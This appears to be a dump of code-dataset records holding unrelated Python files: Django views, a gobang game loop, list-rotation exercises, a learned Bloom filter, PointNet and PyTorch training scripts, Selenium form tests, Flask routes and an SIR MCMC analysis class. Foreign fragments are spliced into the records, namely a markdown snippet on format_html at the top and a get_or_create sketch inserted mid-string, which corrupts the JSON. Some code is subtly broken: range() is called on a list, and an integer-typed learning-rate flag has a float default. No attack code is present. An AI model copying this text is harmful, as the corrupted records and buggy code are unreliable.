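# format_html escapes {} arguments, unlike pre-built % strings.
from django.utils.html import format_html

def view_button(obj_id):
    return format_html(
        '<a class="button" href="/admin/hospital/view/{}/">View</a>', obj_id
    )
```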
ProyectoPruebaDjango.apps.categories.forms import CategoryForm\nfrom ProyectoPruebaDjango.apps.categories.models import Category, CategoryModelForm\n\n# Create your views here.\n\n#ejemplo de uso de save() - Para crear o actualizar categoria\ndef create(request):\n\n #create a model Category instance\n category = Category(name='Categoria 1', description='Categoria creada desde modelo')\n #invoke the save() method to create/save the record\n #NO record id reference, so a create operation is made and the reference is updated with id\n category.save()\n\n #change field on instance\n category.name = 'Categoria 2'\n\n print(\"Se creo la categoria con id = \" + str(category.id))\n\n #invoke the save() method ti update/save record\n #record has id reference from prior save() call, so operation is update.\n #category.save()\n category.save(update_fields=['name']) #actualiza solo el campo 'name'. Por defecto Django actualiza todos los campos\n\n print(\"Se actualizo la categoria con id = \" + str(category.id))\n\n return HttpResponse('Categoria creada con exito') #imprime directamente en pagina\n\n#ejemplo de uso de get() para recuperar UN SOLO registro de categoria\ndef search(request, category_id):\n\n try:\n category = Category.objects.get(id=category_id)\n #category = Category.objects.get(name__contains='PHP') #error si get() recupera mas de un registro\n # category, createdOK = Category.objects.get_or_create(name=\"PHP\") #si no recupera, crea un registro\n #usa get y save combinados\n return HttpResponse(\"Se cargo de la base de datos la categoria: %s\" % category.name)\n except ObjectDoesNotExist:\n return HttpResponse(\"No se encontro la categoria con id = %s\" % category_id)\n\n #prueba con input(). La pagina queda cargando hasta recibir el input\n # try:\n # id_input = input(\"Ingrese el id de la categoria a buscar: \")\n # category = Category.objects.get(id=int(id_input))\n # return HttpResponse(\"Se cargo de la base de datos la categoria: %s\" % category.name)\n # except:\n # return HttpResponse(\"No se encontro la categoria con id = %s\" % id_input)\n\n#ejempl de uso de update()\ndef update(request, category_id):\n cant = Category.objects.filter(id=category_id).update(name='Programacion general') #si no se filtrara por primay key\n # (o campo unique), se podrian recuperar varios registros y update() los actualizaria a TODOS\n # filter() retorna un query set (se ve uso en la siguiente view (funcion index))\n return HttpResponse(\"Se actualizo el nombre de: %d categoria/s\" % cant)\n\n# ejemplo de uso de all(), filter() y in_builk() - para listar todas las categirias\ndef index(request):\n categories = Category.objects.all()\n #categories = Category.objects.filter(name='PHP') #recupero categorias con filtro (SELECT ... 
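A sketch of the `get_or_create` pattern mentioned in the comments, using the document's own `Category` model; it needs a configured Django app context to run:

```python
# get_or_create returns the matching row or inserts one, plus a created flag.
from ProyectoPruebaDjango.apps.categories.models import Category

category, created = Category.objects.get_or_create(
    name="PHP", defaults={"description": "Created on first lookup"}
)
print("inserted new row" if created else "reused existing row")
```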
WHERE name = \"PHP\")\n #categories = Category.objects.in_bulk() #retorna un diccionario con los registros, no un queryset\n #print(categories.query) #permite ver la consulta SQL\n #Artificio: obtiene una lista de categorias (diccionarios) a partir del queryset de all() o filter()\n # Esto se hace para imprimir con el HttpResponse()\n data = [{'id': category.id, 'name': category.name} for category in categories]\n return HttpResponse(str(data))\n\n# views para trabajar con formularios \n\n# create\ndef create_form(request):\n # crear categoria con model form (la clase del form se guarda en models.py junto al modelo)\n if request.method == 'POST':\n # POST, generate form with data from request\n form = CategoryModelForm(request.POST) #se instancia el form con los datos enviados por el\n # usuario por si se debe reenviar al mismo con los datos por no ser validado\n # check if it's valid\n if form.is_valid():\n # Insert into DB\n form.save()\n # redirect to a new URL\n return HttpResponse('Categoria almacenada correctamente en la BD')\n else:\n # GET, generate unbound (blank) form\n form = CategoryModelForm()\n return render(request, 'categories/create.html', {'form':form})\n\n# crear categoria con form standalone (independiente). La clase del form usada se guada en forms.py\n\"\"\" if request.method == \"POST\":\n # POST, generate form with data from request\n form = CategoryForm(request.POST)\n if form.is_valid:\n # process data, insert into DB, generate email, etc\n\n # redirect to a new URL\n return HttpResponse(\"Categoria agregada correctamente\")\n\n else:\n # GET, generate blank form\n form = CategoryForm(initial={'description':'Descripcion opcional'}) \n return render(request, 'categories/create.html', {'form':form}) \"\"\"","sub_path":"ProyectoPruebaDjango/apps/categories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387739547","text":"# coding:utf-8\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\nfrom consts import *\nfrom gobang import GoBang\nfrom render import GameRender\n\n# from gobang_ai import GobangAI\n\nif __name__ == '__main__':\n gobang = GoBang()\n render = GameRender(gobang)\n # 先给AI留个接口\n # ai = GobangAI(gobang, ChessboardState.WHITE)\n result = ChessboardState.EMPTY\n enable_ai = False\n\n while True:\n # 捕捉pygame事件\n for event in pygame.event.get():\n # 退出程序\n if event.type == QUIT:\n exit()\n elif event.type == MOUSEBUTTONDOWN:\n # 成功着棋\n if render.one_step():\n result = gobang.get_chess_result()\n else:\n continue\n if result != ChessboardState.EMPTY:\n break\n if enable_ai:\n # ai.one_step()\n result = gobang.get_chess_result()\n else:\n render.change_state()\n\n # 绘制\n render.draw_chess()\n render.draw_mouse()\n\n if result != ChessboardState.EMPTY:\n render.draw_result(result)\n\n # 刷新\n pygame.display.update()","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287825094","text":"\"\"\"\ninput: [1, 2, 3, 4, 5], k = 2\n\noutput: [3, 4, 5, 1, 2]\n\n\n\ninput: [0, 1, 2, 3, 4], k = 1\n\noutput: [1, 2, 3, 4, 0]\n\"\"\"\n\ndef solution(li:list, k:int):\n for i in range(k):\n first = li[0]\n li = li[1:]\n li.append(first)\n return li\n\ndef solution2(li:list, k:int):\n for i in range(k):\n first = li[0]\n length = len(li)\n for index in range(0,li-1):\n li[index] = li[index+1]\n 
li[-1] = first\n return li\n \ndef solution3(li:list, k:int):\n k = k % len(li)\n first = li[0:k]\n second = li[k:]\n li = second + first\n return li\n\n ","sub_path":"algorithim/src/list_rotation_by_k.py","file_name":"list_rotation_by_k.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119280306","text":"import sys\nimport pickle\nimport math\nimport random\n\nfrom BloomFilter import BestBloomFilter, BloomFilter\nfrom utils import *\n\nsys.path.append(\"../lib\")\n\n\nclass PLBF(object):\n \"\"\"\n Practical learned bloom filter use gbdt as classifier\n \"\"\"\n def __init__(self, model, data, using_Fpr=True, fp_rate=0.01, total_size=100000, model_size=int(70 * 1024 * 8),\n is_train=True):\n self.model = model\n self.threshold = 0.9\n self.using_Fpr = using_Fpr\n self.is_train = is_train\n (s1, s2) = split_negatives(data, 0.7)\n if self.is_train:\n self.fit(data.positives, data.negatives)\n else:\n self.model.load_model()\n if using_Fpr:\n self.fp_rate = float(fp_rate)\n self.create_best_bloom_filter(data, s2)\n else:\n self.m = total_size - model_size\n self.create_bloom_filter(data, s2)\n\n def check(self, item):\n if self.model.predict(item) > self.threshold:\n return True\n return self.bloom_filter.check(item)\n\n def create_best_bloom_filter(self, data, test_negatives):\n print(\"Creating bloom filter\")\n self.get_threshold(test_negatives, data)\n print(\"model threshold: %f\" % self.threshold)\n\n false_negatives = []\n preds = self.model.predicts(data.positives)\n for i in range(len(data.positives)):\n if preds[i] <= self.threshold:\n false_negatives.append(data.positives[i])\n print(\"Number of false negatives at bloom time\", len(false_negatives))\n self.bloom_filter = BestBloomFilter(len(false_negatives), self.fp_rate / 2)\n for fn in false_negatives:\n self.bloom_filter.add(fn)\n print(\"Created bloom filter\")\n print(\"hash function K: \", self.bloom_filter.hash_count)\n print(\"bBF memory size: \", self.bloom_filter.size)\n\n def fit(self, positives, negatives):\n shuffled = shuffle_for_training(negatives, positives)\n self.model.fit(shuffled[0], shuffled[1])\n print(\"Done fitting\")\n\n # add data to test\n def get_threshold(self, test_negatives, data):\n fp_index = math.ceil((len(test_negatives) * (1 - self.fp_rate / 2)))\n predictions = self.model.predicts(test_negatives)\n predictions.sort()\n\n \"\"\"\n import pandas as pd\n excel_data = pd.DataFrame(predictions)\n writer = pd.ExcelWriter('preds.xlsx') # 写入Excel文件\n excel_data.to_excel(writer, float_format='%.5f')\n writer.save()\n writer.close()\n \n # ---------------------------------------------\n predictions = self.model.predicts(test_negatives[0:10])\n print('test negatives:', predictions)\n result1 = list()\n result2 = list()\n for i in range(10):\n result1.append(self.model.predict(test_negatives[i]))\n for i in range(10):\n result2.append(self.model.predict(data.positives[i]))\n print('negative keys test: ', result1)\n print('positive keys test: ', result2)\n exit()\n # \"\"\"\n self.threshold = predictions[fp_index]\n\n","sub_path":"Code/PLBF-GBDT/PLBF.py","file_name":"PLBF.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507130587","text":"import json\n\n# some JSON:\nx = '{\"Name\":\"Rana\", \"Age\":23, \"City\":\"Riyadh\"}'\ny = json.loads(x)\n# the result is a Python dictionary:\nprint(y[\"Age\"])\n\n\nx = 
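`get_threshold` picks the score below which a `1 - fp_rate/2` fraction of negative-key predictions fall, so the classifier alone contributes at most half the false-positive budget. The rule in isolation, with a clamp added (an assumption) to guard the boundary case where `fp_index` equals the list length:

```python
import math

def threshold_from_negatives(negative_scores, fp_rate):
    scores = sorted(negative_scores)
    fp_index = math.ceil(len(scores) * (1 - fp_rate / 2))
    return scores[min(fp_index, len(scores) - 1)]  # clamp guards the edge case

print(threshold_from_negatives([0.1, 0.2, 0.3, 0.9], 0.5))  # -> 0.9
```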
{\"Name\": \"Rana\", \"Age\": 23, \"City\": \"Riyadh\"}\n# convert into json\ny = json.dumps(x)\n# the result is a json string\nprint(y)\n\n\nx = {\n \"name\": \"Rana\",\n \"age\": 23,\n \"married\": False,\n \"divorced\": False,\n \"children\": None,\n \"pets\": True,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\ny = json.dumps(x)\nprint(y)\n","sub_path":"Day55.py","file_name":"Day55.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"640037168","text":"import tensorflow as tf\nimport utils.shapenet_provider as sp\nimport utils.matplot_viewer as mpv\nimport cfgs.pointnet_config as pn_cfg\nimport models.pointnet_cls as model\nimport os\nimport numpy as np\n\n# Download shapenet data\nsp.download_data()\n# Get pointnet config\ncfg = pn_cfg.get_pointnet_config()\n\n\ndef show_pc():\n for idx in range(len(cfg.train_files)):\n temp_data = sp.load_h5(cfg.train_files[idx])\n temp_labels = temp_data[1]\n # print(temp_labels)\n for j in range(3, len(temp_data[0])):\n mpv.show_pointcloud_fromarray(temp_data[0][j], cfg.label_names[temp_labels[j][0]])\n\n\ndef train():\n with tf.Graph().as_default():\n with tf.device('/gpu:' + str(cfg.gpu_idx)):\n pc_pl, labels_pl = model.get_inputs_pl(cfg.batch_size, cfg.point_num)\n is_training_pl = tf.placeholder(tf.bool, shape=())\n print(is_training_pl)\n batch = tf.Variable(0)\n bn_decay = get_bn_decay(batch)\n pred, end_points = model.get_model(pc_pl, is_training_pl, bn_decay=bn_decay)\n loss = model.get_loss(pred, labels_pl, end_points)\n correct = tf.equal(tf.argmax(pred, 1), tf.to_int64(labels_pl))\n accuracy = tf.reduce_sum(tf.cast(correct, tf.float32)) / float(cfg.batch_size)\n learning_rate = get_learning_rate(batch)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = optimizer.minimize(loss, global_step=batch)\n saver = tf.train.Saver()\n # Create a session\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n sess = tf.Session(config=config)\n init = tf.global_variables_initializer()\n sess.run(init, {is_training_pl: True})\n ops = {'pc_pl': pc_pl,\n 'labels_pl': labels_pl,\n 'is_training_pl': is_training_pl,\n 'pred': pred,\n 'loss': loss,\n 'train_op': train_op,\n 'step': batch}\n for epoch in range(cfg.max_epoch):\n print('**** EPOCH %03d ****' % epoch)\n\n train_one_epoch(sess, ops)\n\n # Save the variables to disk.\n if epoch % 50 == 0:\n save_path = saver.save(sess, os.path.join(cfg.model_dir, \"model%03d.ckpt\" % epoch))\n print(\"Model saved in file: %s\" % save_path)\n\n\ndef get_learning_rate(batch):\n learning_rate = tf.train.exponential_decay(\n cfg.base_lr, # Base learning rate.\n batch * cfg.batch_size, # Current index into the dataset.\n cfg.decay_step, # Decay step.\n cfg.decay_rate, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 0.00001) # CLIP THE LEARNING RATE!\n return learning_rate\n\n\ndef get_bn_decay(batch):\n bn_momentum = tf.train.exponential_decay(\n 0.5,\n batch*cfg.batch_size,\n float(cfg.decay_step),\n 0.5,\n staircase=True)\n bn_decay = tf.minimum(0.99, 1 - bn_momentum)\n return bn_decay\n\n\ndef train_one_epoch(sess, ops):\n \"\"\" ops: dict mapping from string to tf ops \"\"\"\n is_training = True\n\n # Shuffle train files\n train_file_idxs = np.arange(0, len(cfg.train_files))\n np.random.shuffle(train_file_idxs)\n\n for fn in 
range(len(cfg.train_files)):\n print('----' + str(fn) + '-----')\n current_data, current_label = sp.loadDataFile(cfg.train_files[train_file_idxs[fn]])\n current_data = current_data[:, 0:cfg.point_num, :]\n current_data, current_label, _ = sp.shuffle_data(current_data, np.squeeze(current_label))\n current_label = np.squeeze(current_label)\n\n file_size = current_data.shape[0]\n num_batches = file_size // cfg.batch_size\n\n total_correct = 0\n total_seen = 0\n loss_sum = 0\n\n for batch_idx in range(num_batches):\n start_idx = batch_idx * cfg.batch_size\n end_idx = (batch_idx + 1) * cfg.batch_size\n\n # Augment batched point clouds by rotation and jittering\n rotated_data = sp.rotate_point_cloud(current_data[start_idx:end_idx, :, :])\n jittered_data = sp.jitter_point_cloud(rotated_data)\n feed_dict = {ops['pc_pl']: jittered_data,\n ops['labels_pl']: current_label[start_idx:end_idx],\n ops['is_training_pl']: is_training, }\n step, _, loss_val, pred_val = sess.run([ops['step'],\n ops['train_op'],\n ops['loss'],\n ops['pred']],\n feed_dict=feed_dict)\n pred_val = np.argmax(pred_val, 1)\n correct = np.sum(pred_val == current_label[start_idx:end_idx])\n total_correct += correct\n total_seen += cfg.batch_size\n loss_sum += loss_val\n\n print('mean loss: %f' % (loss_sum / float(num_batches)))\n print('accuracy: %f' % (total_correct / float(total_seen)))\n\n\ntrain()\n","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492866183","text":"import os\nimport utils\nimport argparse\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\n# dataset\nfrom data import SignalDataset\n\n# call model\nfrom model import Baseline\nimport train\n# base config\n\n\ndef config():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_dir', type=str,\n default='./data', help='signal data dir')\n parser.add_argument('--num_epoch', type=int, default=10, help='epoch')\n parser.add_argument('--lr', type=int, default=1e-3, help='learning rate')\n parser.add_argument('--batch_size', type=int,\n default=16, help='data batch size')\n parser.add_argument('--model', type=str,\n default='Baseline', help='train model')\n parser.add_argument('--save_dir', type=str,\n default='./results', help='output data dir')\n parser.add_argument('--save_name', type=str,\n default='', help='manual name')\n parser.add_argument('--ngpu', type=int, default=1,\n help='Multi gpu training ')\n parser.add_argument('--device', type=None, default=torch.device('cuda:1'),\n help='cuda device index')\n parser.add_argument('--mode', type=str, choices=['3000', '1000'], help='data numbers')\n parser.add_argument('--num_worker', type=int, default=4, help='num workers')\n\n args = parser.parse_args()\n return args\n\n\ndef split_weight(net):\n \"\"\"\n split weights into categories\n one : conv, linear layer => decay\n others : bn weights, bias \n \"\"\"\n\n decay = []\n no_decay = []\n\n for m in net.modules():\n if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):\n decay.append(m.weight)\n\n if m.bias is not None:\n no_decay.append(m.bias)\n else:\n # class에 인자가 있는지 확인\n if hasattr(m, 'weight'):\n no_decay.append(m.weight)\n if hasattr(m, 'bias'):\n no_decay.append(m.bias)\n\n assert len(list(net.parameters())) == len(decay) + len(no_decay)\n # net.parameters() 형태로 반환\n return 
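`get_learning_rate` wraps `tf.train.exponential_decay` with `staircase=True`; what that computes for one global step, written out in plain Python:

```python
# staircase decay: lr = base * rate ** floor(step * batch / decay_step),
# then clipped from below, mirroring the tf.maximum call.
def staircase_decay(base_lr, step, batch_size, decay_step, decay_rate, floor_lr=1e-5):
    lr = base_lr * decay_rate ** ((step * batch_size) // decay_step)
    return max(lr, floor_lr)

print(staircase_decay(0.001, step=5000, batch_size=32,
                      decay_step=80000, decay_rate=0.7))  # 0.00049
```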
[dict(params=decay), dict(params=no_decay, weight_decay=0)]\n\n\ndef main():\n args = config()\n # args, inner variable\n device = args.device\n batch_size = args.batch_size\n num_workers = args.num_worker\n torch.backends.cudnn.benchmark = True\n\n # data loader - already SignalDataset to cuda\n # dataset : dictionary train, dev, test\n datasets = {}\n dataloaders = {}\n\n for k in ['train', 'eval', 'test']:\n datasets[k] = SignalDataset(k, args.data_dir)\n dataloaders[k] = DataLoader(\n datasets[k], args.batch_size, shuffle=True, num_workers=4)\n if k == 'test':\n dataloaders[k] = DataLoader(\n datasets[k], args.batch_size, shuffle=False, num_workers=4)\n\n # model load\n\n if args.ngpu > 1:\n print(f\"Model Build....{args.model}\")\n model = args.model().to(device)\n torch.nn.DataParallel(model)\n else:\n print(f\"Model Build....{args.model}\")\n model = Baseline().to(device)\n\n\n # criterion\n\n criterion = nn.BCEWithLogitsLoss()\n # criterion = nn.MSELoss()\n\n # optimizer\n # adam default => le =1e-3 , betas : 0.9, 0.999 eps=1e-8, weight decay=0\n params = split_weight(model)\n #optimizer = optim.Adam(params)\n optimizer = optim.Adamax(params, lr=args.lr)\n # scheduler\n scheduler = lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)\n\n # Train\n best_model = train.train(dataloaders, model, criterion, optimizer, scheduler, args)\n\n # Test\n #test_loss, test_pred = test(dataloaders, model, criterion, optimizer, scheduler, args)\n\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n\n # save\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Datathon/BIOSIG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459202508","text":"import logging\nimport time\n\nimport pytest\n\nfrom common.utils import resize_browser\n\nlogger = logging.getLogger(__name__)\n\n@pytest.fixture(scope='function')\ndef browser(module_browser, base_url, request):\n resize_browser(browser=module_browser, resolution=request.param)\n time.sleep(0.5)\n module_browser.get(base_url)\n if module_browser.is_desktop():\n module_browser.click(xpath=\"//a[@id='best-expense-video-id']\")\n else:\n module_browser.click(xpath=\"//div[contains(@class, 'sticky-cta-mobile')]/a\")\n time.sleep(1)\n return module_browser\n\ndef submit_getdemo_form(browser, email=None, firstname=None, lastname=None, phone=None, company_size=None, agree=None):\n if email:\n browser.input(xpath=\"//input[@name='email']\", keys=email)\n if firstname:\n browser.input(xpath=\"//input[@name='firstname']\", keys=firstname)\n if lastname:\n browser.input(xpath=\"//input[@name='lastname']\", keys=lastname)\n if phone:\n browser.input(xpath=\"//input[@name='phone']\", keys=phone)\n if company_size:\n browser.click(xpath=\"//input[@id='number_of_employees']\")\n browser.click(xpath=f\"//li[@data-value='{company_size}']\")\n if agree:\n browser.click(xpath='//div[contains(@class, \"custom-checkbox\")]')\n browser.click(xpath='//button[text()=\"Get a demo\"]')\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_bad_email(browser):\n submit_getdemo_form(browser, email='foo')\n e = browser.find(xpath=\"//label[@for='demo-email'][@class='error']\")\n assert e and e.is_displayed(), 'No error displayed for invalid email'\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_missing_firstname(browser):\n submit_getdemo_form(browser, 
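Usage sketch for `split_weight`: passing its two groups to the optimizer applies the optimizer-level weight decay only to conv/linear weights, while the second group pins decay to zero:

```python
# Group 1 (conv/linear weights) inherits weight_decay=1e-4;
# group 2 (biases, norm params) keeps its explicit weight_decay=0.
import torch.nn as nn
import torch.optim as optim

net = nn.Sequential(nn.Conv1d(1, 4, 3), nn.BatchNorm1d(4), nn.Linear(4, 2))
params = split_weight(net)                     # defined above
optimizer = optim.Adamax(params, lr=1e-3, weight_decay=1e-4)
for group in optimizer.param_groups:
    print(len(group["params"]), group["weight_decay"])  # 2 0.0001 / 4 0
```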
email='megatron@fyle.in')\n e = browser.find(xpath=\"//label[@for='demo-first-name'][@class='error demo-first-name-error']\")\n assert e and e.is_displayed(), 'No error displayed for missing firstname'\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_success(browser):\n submit_getdemo_form(browser, email='megatron@fyle.in', firstname='Megatron', lastname='Transformer', phone='123456789', company_size='Under 5', agree=True)\n time.sleep(2)\n e = browser.find(xpath=\"//h3[contains(text(), 'Thank')]\")\n assert e and e.is_displayed(), 'Not displaying thank you message'\n","sub_path":"homepage/test_getdemo.py","file_name":"test_getdemo.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407542214","text":"\nfrom . import it_planning_app\nfrom .get_incoming import *\nfrom .it_planning import create_graph\nfrom .node_add import add_node\nfrom .node_edit import edit_node\nfrom .node_remove import remove_node\nfrom flask import render_template, session, jsonify, redirect, url_for, request\nfrom login.decorators import is_logged_in, it_allowed\n\n\n@it_planning_app.route('/itPlanning', methods=[\"POST\", \"GET\"])\n@is_logged_in\n@it_allowed\ndef it_planning():\n \"\"\"\n Для пользоватеей с it_role = 1 и 2 будут строиться полные графы\n :return:\n \"\"\"\n ack = create_graph()\n return ack\n\n\n@it_planning_app.route('/itPlanningBubles', methods=[\"GET\"])\n@is_logged_in\n@it_allowed\ndef itPlanningBubles():\n role = request.args.get('role', default=0, type=int)\n scenario = request.args.get('scenario', default=0, type=int)\n if role == session['it_role'] and scenario:\n return render_template('it_planning/itPlanningBubles.html')\n return redirect(url_for('it_planning_app.itPlanningMenu'))\n\n\n@it_planning_app.route('/itPlanningMenu', methods=['POST', 'GET'])\n@is_logged_in\n@it_allowed\ndef itPlanningMenu():\n if request.method == 'POST':\n print(dict(session))\n return jsonify(access=dict(session))\n return render_template('it_planning/itPlanningMenu.html')\n\n\n@it_planning_app.route('/itPlanningChange', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef redacting_node():\n incoming_data = get_edit_incoming()\n return edit_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningAdd', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef adding_node():\n incoming_data = get_add_incoming()\n return add_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningRemove', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef removing_node():\n incoming_data = get_remove_incoming()\n return remove_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningChange_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef redacting_goals_node():\n incoming_data = get_edit_incoming()\n return edit_node(\"goals\", incoming_data)\n\n\n@it_planning_app.route('/itPlanningAdd_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef adding_goals_node():\n incoming_data = get_add_incoming()\n return add_node(\"goals\", incoming_data)\n\n\n@it_planning_app.route('/itPlanningRemove_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef removing_goals_node():\n incoming_data = get_remove_incoming()\n return remove_node(\"goals\", incoming_data)\n","sub_path":"it_planning/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
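The `browser` fixture above receives `'desktop_1'`/`'mobile_1'` through indirect parametrization; a minimal standalone example of that mechanism:

```python
# With indirect=True, the parameter lands on request.param inside the fixture.
import pytest

@pytest.fixture
def resolution(request):
    return {"desktop_1": (1920, 1080), "mobile_1": (375, 667)}[request.param]

@pytest.mark.parametrize("resolution", ["desktop_1", "mobile_1"], indirect=True)
def test_resolution_is_resolved(resolution):
    assert len(resolution) == 2
```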
+{"seq_id":"73614618","text":"'''\nThis class contains functions to\n1) run_MCMC(): execute the MCMC algorithm for SIR models,and save results\n2) load_data(): load nummerical results (the Markov Chain)\n3) report(): compute the marginal likelihood\n4) remove_burning (): remove first smaples of the chain\n5) plot (): for visualize the obtain results\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom SIRparamIden import SirIden as SirIden\nfrom SIRparamIden import simpleSirIden as simpleSirIden\nfrom xSIRparamIden import hyperSirIden as hyperSirIden\nfrom uqVisual import uqPlot\nimport genLib as genLib\nfrom AlgorithmPram import AlgorithmParam as AlgParam\n\n\nclass postProcessing(AlgParam):\n def __init__(self,country_region,model, **kwargs):\n AlgParam.__init__(self, country_region)\n self.model = model\n if model == 'SIR':\n self.SIR = SirIden(country_region= self.country_region) \n elif model =='simSIR':\n self.SIR = simpleSirIden(country_region= self.country_region) \n #gammaSize = 1\n elif model == 'hyperSIR':\n self.SIR = hyperSirIden(initT, deltaT, N, n_MC = self.n_MC, kernel_std_ratio = self.kernel_std_ratio, country_region= self.country_region, observation_deltaT = 14) \n \n if 'loadInit' in kwargs.keys():\n self.loadInit = kwargs['loadInit']\n self.ithrun = kwargs['ithrun']\n if self.loadInit:\n self.filename = model +country_region + str(self.ithrun)\n self.loadfile = model +country_region + str(self.ithrun-1)\n if self.ithrun == 1:\n self.loadfile = model +country_region\n else: self.loadInit = 0\n if self.loadInit == 0:\n self.filename = model + country_region\n f = plt.figure()\n self.SIR.LikelihoodFunc.plotLikelihood()\n f.savefig(self.result_dir+'likelihoodfunction.pdf',bbox_inches='tight')\n self.observationTime4Val = self.SIR.time[np.arange(5,self.SIR.time.size, 20, dtype = int )]\n \n\n def run_mcmc (self,**kwargs):\n #### Perform MCMC\n if self.loadInit == 0:\n np.random.seed(100)\n x_init = self.SIR.prior_pdf_rvs()\n print (x_init)\n print(self.SIR.x2theta_x0(x_init))\n x_init[0:self.SIR.theta_dim//2] = np.log(0.2)\n x_init[self.SIR.theta_dim//2:self.SIR.theta_dim] = np.log(0.2)\n else:\n x_prev = self.load_data(self.result_dir+self.loadfile)\n x_init = np.mean(x_prev, axis = 0)\n x = self.SIR.run_MCMC(x_init = x_init)\n #### End MCMC process\n \n np.save(self.result_dir+self.filename+'.npy', x)\n xremovedBurning = self.remove_burning(x)\n self.report(xremovedBurning)\n self.plot(xremovedBurning)\n return xremovedBurning\n def report(self,xremovedBurning, **kwargs):\n scaledBC, logscaledConst = self.SIR.modelBayesCriterion(xremovedBurning, observationTime = self.observationTime4Val)\n print ('marginal Likelihood', np.exp(np.log(scaledBC) + logscaledConst)) \n if self.loadInit:\n filename = self.model + self.country_region + str(self.ithrun) + 'Cont.csv' \n else:\n filename = self.model + self.country_region +'.csv' \n genLib.report(filename, model = self.model, country_region = self.country_region, initT = self.SIR.initT, N = self.SIR.N,\n n_MC = self.SIR.n_MC,\n deltaT = self.SIR.deltaT, observation_deltaT = self.SIR.observation_deltaT,\n scaledBC= scaledBC, logscaledConst= logscaledConst,\n #executionTime = self.SIR.executionTime,\n marginalLikelihood = np.exp(np.log(scaledBC) + logscaledConst),x_mean = xremovedBurning.mean(axis =0))\n ####\n def remove_burning(self,x):\n return x[-self.n_MC_keep:,:]\n def load_data(self,loadfile):\n x = np.load(loadfile+'.npy')\n xremovedBurning = self.remove_burning(x)\n return xremovedBurning\n def plot(self,x,qtPlot 
= 0.95): \n x_mean = x.mean(axis = 0)\n if self.model != 'hyperSIR':\n logthetaM, x0M = self.SIR.x2theta_x0(x_mean)\n else:\n logthetaM, x0M, hyperParam = self.SIR.x2theta_x0(x_mean)\n \n print (x_mean)\n fxmean = self.SIR.interpolate_theta(logthetaM)\n plt.figure('beta')\n plt.plot(self.SIR.model.time,(fxmean[0,:]))\n plt.figure('gamma')\n plt.plot(self.SIR.model.time,(fxmean[1,:]))\n \n plt.figure('mean value') \n self.SIR.plot(x_mean)\n plt.xlim ([0, self.SIR.time_4_eval_marginal_likelihood.max() + self.SIR.initT])\n plt.ylim([0,self.SIR.data.confirmed.max()])\n plt.legend()\n \n f= plt.figure('ACF Beta')\n steps = np.arange(0,1000,1,dtype = int)\n uqPlot.autocorrelation(x[:,0],steps)\n f.savefig(self.result_dir+self.model + self.country_region + \"ACFBeta.pdf\", bbox_inches='tight')\n plt.show()\n \n \n \n #Posprocessing data \n active_cases_posterior_samples = np.zeros(shape = (x.shape[0], self.SIR.model.time.size ))# infection and recovered\n total_infections_posterior_samples = np.zeros(shape = (x.shape[0], self.SIR.model.time.size ))# infection and recovered\n beta = np.zeros(shape = (x.shape[0], self.SIR.time_node.size ))# infection and recovered\n gamma = np.zeros(shape = (x.shape[0],self.SIR.time_node.size ))# infection and recovered = np.zeros(shape = (x.shape[0],SIR.time_node.size ))# infection and recovered\n if self.model == 'hyperSIR':\n alpha = np.zeros(shape = (x.shape[0],self.SIR.priorHyperParamDim))# infection and recovered\n \n for i in range(x.shape[0]):\n if self.model != 'hyperSIR':\n theta, x0 = self.SIR.x2theta_x0(x[i,:])\n else:\n theta, x0, hyperParam = self.SIR.x2theta_x0(x[i,:])\n if self.model == 